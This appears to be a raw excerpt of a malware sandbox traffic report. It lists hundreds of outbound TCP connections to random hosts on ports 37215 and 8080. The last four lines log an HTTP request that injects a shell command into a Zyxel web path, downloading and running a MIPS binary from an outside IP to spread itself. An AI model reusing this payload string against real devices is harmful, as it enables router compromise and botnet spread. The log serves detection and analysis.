            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.6.103.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.235.8.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 19.244.184.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.33.142.80:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.231.30.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 178.82.235.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.136.27.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 5.243.59.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.157.93.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.130.60.80:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 123.217.43.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.117.223.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 103.164.169.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 174.64.86.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.216.244.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.19.49.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.117.162.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.4.126.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.69.95.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.127.112.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 221.77.50.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.188.180.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 75.143.188.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.33.79.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.16.236.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 184.218.124.78:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.150.118.57:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 116.20.241.179:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.148.119.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.61.111.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 175.129.158.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.125.225.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.148.104.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.19.254.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.94.177.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.22.220.49:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 60.62.125.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.55.43.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.92.243.239:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 65.191.128.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.28.50.31:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.201.233.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 108.84.192.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.54.66.85:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 125.0.246.106:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 46.235.209.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.19.23.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.40.120.25:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.224.60.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 185.196.48.244:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.99.136.0:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.62.35.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 159.143.124.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.239.115.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 204.34.108.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.11.150.47:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.48.40.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.48.123.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 169.49.4.39:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.125.174.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 67.115.102.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.39.207.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.219.48.29:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.74.184.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 126.123.181.9:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 39.109.73.1:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.11.228.162:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.249.172.34:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 193.179.93.49:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 19.172.17.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.25.21.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.204.233.54:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.197.18.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.85.48.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 217.98.142.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.196.181.19:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.196.118.196:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.248.230.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 219.181.57.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 124.65.44.174:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 121.92.24.65:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.158.234.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.194.185.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.126.247.114:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.22.179.114:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.66.24.250:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.171.142.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.249.151.185:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 59.209.221.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.116.52.214:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 79.113.75.145:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.53.249.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 48.93.10.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.22.129.142:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 142.194.190.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.98.49.132:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.152.92.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.193.81.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 41.36.238.86:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.172.188.167:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 197.82.163.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.233.76.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:11114 -> 157.255.63.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 19.161.204.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 186.229.74.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 37.249.86.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 194.253.253.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 189.247.89.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 18.191.189.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 78.97.240.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 118.98.155.59:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 160.30.210.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 4.243.98.10:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 153.193.10.151:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 219.68.195.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 179.107.54.60:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 178.171.135.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 158.39.181.86:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 184.54.229.71:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 147.144.197.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 140.197.55.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 52.156.135.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 208.213.21.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 107.106.143.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 128.176.109.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 104.106.96.224:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 148.73.58.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 146.83.22.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 71.151.92.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 32.186.91.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 143.78.145.191:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 206.158.106.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 171.246.9.172:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 38.190.154.41:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 57.97.103.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 186.40.136.154:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 177.240.55.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 38.180.217.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 156.217.63.168:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 217.110.89.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 178.110.160.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 72.156.87.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 149.3.5.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 97.139.198.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 188.239.245.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 138.243.91.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 37.100.43.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 125.96.51.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 74.108.35.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 216.241.37.216:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 40.53.85.250:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 78.4.224.1:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 27.80.250.86:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 167.155.211.197:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 155.17.150.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 141.39.141.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 206.136.66.190:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 91.10.75.234:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 126.65.161.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 115.180.58.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 220.64.4.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 171.119.84.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 14.104.94.0:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 101.103.232.122:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 150.57.201.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 50.31.174.168:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 154.203.115.51:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 169.217.132.94:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 95.67.189.253:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 49.234.209.65:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 66.149.93.35:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 5.232.30.93:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 1.156.65.105:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 194.39.75.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 181.97.153.101:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 121.179.86.107:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 84.94.119.77:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 89.39.85.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 194.237.27.117:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 205.30.101.82:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 39.37.213.216:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 171.121.44.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 67.145.229.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 64.224.30.30:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 117.83.48.22:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 205.172.59.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 212.164.161.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 141.58.66.80:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 49.208.51.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 54.159.77.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 80.253.84.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 174.86.4.177:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 38.27.250.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 170.14.228.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 213.242.138.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 97.125.2.234:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 221.62.208.50:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 178.111.32.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 88.180.33.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 221.68.211.215:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 24.196.112.126:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 122.69.110.31:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 222.197.235.169:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 184.244.97.103:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 138.146.225.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 219.241.121.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 1.19.84.82:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 24.5.161.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 27.48.131.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 111.10.16.156:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 41.225.93.152:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 68.187.163.70:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 46.21.210.2:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 36.82.93.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 158.195.157.34:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 164.66.60.100:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 218.168.140.46:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 208.12.217.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 64.137.158.147:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 61.154.103.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 134.57.251.37:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 47.188.15.128:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 135.82.24.25:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 185.94.223.202:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 157.32.5.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 171.8.61.52:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 156.239.184.254:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 209.187.4.202:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 64.6.46.249:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 122.163.38.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 185.180.115.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 204.185.81.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 111.144.45.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 57.37.240.204:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 48.92.59.211:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 186.91.72.179:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 108.196.25.228:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 152.88.57.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 126.148.4.156:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 32.169.153.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 150.209.181.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 155.22.36.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 146.88.198.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 150.8.100.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 74.101.116.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 169.198.170.197:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 184.22.188.161:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 93.140.115.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 174.255.213.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 177.23.36.72:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 153.248.146.80:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 91.57.155.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 89.93.69.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 58.246.103.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 153.212.131.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 135.247.143.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 78.19.115.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 24.22.230.222:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 163.194.178.106:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 113.92.56.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 96.237.228.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 52.126.89.12:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 211.198.18.231:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 60.195.34.192:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 63.227.148.55:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 101.208.133.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 78.174.70.105:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 207.115.40.208:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 129.46.229.193:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 74.217.208.42:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 32.16.114.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 154.187.7.150:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 156.106.25.25:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 124.16.58.209:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 205.123.226.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 43.1.245.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 99.167.206.67:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 41.130.23.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 102.41.15.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 20.56.153.35:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 162.107.236.68:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 118.141.175.237:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 67.234.147.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 212.31.52.205:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 144.52.73.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 178.76.34.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 208.17.82.13:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 187.90.11.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 207.122.245.107:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 190.132.219.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 167.11.130.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 171.38.236.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 113.77.193.83:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 151.222.247.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 137.46.5.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 77.61.31.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 73.96.194.19:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 176.198.104.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 185.162.251.169:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 180.209.203.174:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 150.106.138.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 199.212.235.165:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 75.182.125.62:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 46.188.55.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 175.166.176.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 39.172.56.193:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 191.242.75.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 80.83.247.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 126.218.140.16:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 173.87.28.250:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 143.66.243.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 185.130.217.84:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 153.201.75.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 52.17.123.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 66.190.84.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 162.11.248.128:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 116.11.4.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 220.9.112.8:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 106.215.4.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 211.83.204.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 8.165.155.42:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 216.1.123.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 170.148.235.130:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 130.136.156.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 124.32.8.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 60.141.82.180:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 43.15.164.36:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 67.90.138.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 110.90.112.126:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 156.115.206.103:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 115.53.27.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 158.68.145.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 161.126.111.214:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 198.168.213.0:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 189.253.252.227:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 67.105.136.132:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 108.237.249.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 2.248.217.157:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 54.152.233.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 199.161.211.149:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 120.156.229.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 12.94.121.217:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 99.248.80.207:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 48.224.23.168:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 62.241.190.74:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 206.113.164.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 48.118.42.120:8080
            Source: global trafficTCP traffic: 192.168.2.14:11111 -> 145.113.80.247:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
